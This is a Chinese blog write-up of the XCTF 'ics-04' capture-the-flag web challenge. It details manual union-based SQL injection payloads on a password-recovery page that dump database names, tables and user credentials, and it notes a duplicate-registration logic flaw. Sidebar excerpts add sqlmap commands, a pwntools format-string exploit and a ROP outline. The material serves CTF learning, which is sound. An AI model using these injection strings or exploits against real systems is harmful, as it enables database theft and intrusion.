XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)

最新推荐文章于 2022-03-10 21:00:00 发布
最新推荐文章于 2022-03-10 21:00:00 发布
阅读量468 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daqiangdetianxia/article/details/107997931
版权

为了避免眼高手低,能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。

简单的一道sql注入题目加一个简单的逻辑漏洞。

信息搜集

页面:login.php,register.php,findpwd.php
服务器:Apache/2.4.7 (Ubuntu)
ICS工业控制系统

漏洞查找

一、 经过测试,发现findpwd页面存在sql注入漏洞
在这里插入图片描述
二、手工注入
1.确定列数
admin1' order by 4#经过测试,一共有四列,其中admin1是我自己注册的用户。
2.确定注入列数.
' union select 1,1,version(),1#通过移动version()的位置,最终确定存在注入的列数在第三列。 在这里插入图片描述3.查询数据库名。
' union select 1,1,group_concat(schema_name),1 from information_schema.schemata #查询出数据库名字为cetc004
在这里插入图片描述
4. 查询表名:

'union select 1,1,group_concat(char(58),table_name),1 from information_schema.tables where table_schema='cetc004'#查询到表名user
在这里插入图片描述5.查询列名
' union select 1,1,group_concat(column_name),1 from information_schema.columns where table_name='user'#
查询到列名。
在这里插入图片描述6.查表中的数据

'union select 1,2,group_concat(char(58),username,',',password,',',question,',',answer),4 from cetc004.user;#得到数据
在这里插入图片描述

这里可以利用md5彩虹表进行破解密码,也可以利用逻辑漏洞,重新注册username,获得帐号密码。

最后用帐号密码登录就会出现flag。

hiddenCarry
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界ics-04解题思路
zsqad的博客
12-10 1746
题目 攻防世界ics-04 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 解题思路 打开题目提供的环境,发现整个页面只有注册、登录、找回密码功能是可以用的,尝试注册一个账户进行登录,提示普通用户登录成功,没什么用,可以猜测出题者的意图是让我们拿到管理员账号登录获得flag。 打开找回密码界面,随意输入一个用户名,发现界面上会提示没有这个用户,因此此处应该可以爆破用户名,但是如果用...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
[XCTF 4th-CyberEarth]ics-05
sGanYu
08-26 2138
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开题目,是一个工控云管理系统,随意点击旁边的菜单,发现只有设备维护中心可以正常进入 无意间点击左上角‘云平台设备维护中心’之后,发现页面进行跳转,page=index 将URL内的index改为任何字符,页面都会进行回显 在index后添加一个.php,页面回显ok,说明index.php存在,可以尝试读取一下 这里需要用到php://filter协议读内容 php://filter/read=conver..
[BMZCTF-pwn] 01-XCTF 4th-CyberEarth
weixin_52640415的博客
02-12 201
给了个后门,pie未开,直接通过printf漏洞将key写为指定值即可。 from pwn import * p = remote('www.bmzclub.cn', 21355) context(arch='i386', log_level = 'debug') payload = fmtstr_payload(12, {0x0804a048: 35795746}) #key = xxxx p.sendline(payload) p.interactive() ...
攻防世界XCTFics-04
末初的CSDN博客
03-13 1107
有三个可以访问的地方,注册,登录和找回密码 注册功能:没有sql注入,但是测试出一个账号可以重复注册 登录功能:也没有sql注入,一个账号能够使用不同的面登录 找回密码页面存在SQL注入 sqlmap扫一波 记住需要指定参数 python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" ...
[XCTF-pwn] 37_xctf-4th-CyberEarth_play
weixin_52640415的博客
03-10 249
又买一个,实在是代码太我看不明白了。 解题思路: 用同一个用户登录两次,选择不同的攻击方式,直到成功。 成功后,输入名字的地方有溢出,在这里写入rop:泄露,修改got.puts为system,再调用puts(/bin/sh) 验证后的exp: from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_i386/ld-2.23-i386-0ubuntu11.so pw...
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
攻防世界 ics-04
freerats的博客
06-04 501
根据提示,漏洞在登入和注册页面,只看这两个地方就ok了 在注册页面发现可以重复注册 懒得一个个手测就直接用awvs扫一下,发现登录界面的忘记密码界面存在注入,手工试了一下 1’ or ‘1’='1 可以闭合 手工简单尝试了一下,没有找到有效的注入方式,用sqlmap看看能不能跑出来 跑出注入点和注入类型没有问题 接下来的比较顺利,常规的查数据库查表查列即可 查出列中的数据后,可以发现password是加密后的值,这个时候就可以利用重复注册这个漏洞,用这个账号密码去 ...
CTF ics-04
艺博东的博客
10-05 9960
难度系数: ★★★★ 题目来源: XCTF 4th-CyberEarth 题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、先注册几个账号,相同的用户名 3、登录—>忘记密码 4、忘记密码 5、在kail Linux 里,开始sql注入 执行如下: 5.1 sqlmap ‐u "http://220.249.52.133:5296
XCTF ics-04
qq_41941506的博客
05-20 2827
根据题目提示在登录及注册中有漏洞 首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入, python2 sqlmap.py -r post.txt --dump -C "username,password...
[xctf]ics-04
胖胖的ALEX
07-10 4386
类型:web 网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918 描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 一句话总结:sql注入、业务逻辑漏洞 过程: 有三个可以访问的功能,注册、登录和找回密码 注册功能:没有sql注入,一个账号可以重复注册漏洞...
攻防世界-高手进阶区之ics-04
Sacrifice_li的博客
06-11 780
进来页面是这样的: 注册页面: 我们就尝试随便注册一个用户,然后登陆发现没啥用: 这里还有一个忘记密码可以点击: 可以猜测这里有没有注入漏洞: 我注册的用户名为1,然后去试试 1’ and 1=1# 以及 1' and 1=2# ,发现是存在注入漏洞的。 然后就去判断字段数以及那个字段是有回显的,1' order by 4# 可以显示,然后-1’ union select 1,2,3,4: 3的位置是回显位置,接下来就是去找数据库名: -1' union select .
攻防世界web进阶区之ics-04
qq_45756971的博客
08-08 288
题目:进去点击右上角的注册界面先注册一个账号发现登陆不成功我们可以从那个忘记密码处寻找突破口,经过测试,发现这个页面存在SQL注入漏洞,在用户名框内输入 1’OR(1)OR’ ,页面发生了变化,成功绕过用户名检查。 找数据库名:-1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata # 数据名为cetc004,表名:-1’ union select 1,2,group_concat(table_nam
[wp] 攻防世界 ics-04
热门推荐
MercyLin的博客
09-24 3万+
尝试注册登陆账号 扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...
[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)
baguangman5501的博客
09-23 819
原作者:admin [原理] 文件包含读源码、x-forwarded-for preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。 [目的] 掌握正则表达式、伪协议读取源码 [环境] windows [工具] firefox、burp [步骤] 1.进入云平台设备维护中心页面,利用php伪协议读取源码...
攻防世界web进阶区ics-04
gongjingege的博客
08-03 225
题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 考虑是否存在注入漏洞 只有三个地方可以点,登录,注册,忘记密码 先注册 普通用户登录没什么用,估计得管理员登录 登录和注册页面没有注入点,就忘记密码 测试后存在注入,1’or 1=1#绕过 手工测试,后台过滤了一部分,直接union select, 1’ union select 1,2,3,4# 页面回显正常 查询数据库 1’ union select 1,2,group_concat(schema_name),4 fr
攻防世界web高手进阶区ics-04
weixin_43885355的博客
11-26 1508
攻防世界web高手进阶区ics-04 这是看了 harry_c 写的,做的一个补充,harry_c 写的链接是: https://blog.csdn.net/harry_c/article/details/98540820 写得粗糙多多见谅 实操 1、使用命令进行sql注入,猜解到4个数据库 cetc004 information_schema mysql performance_schema 2...
web-ics-05
最新发布
07-28
- *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值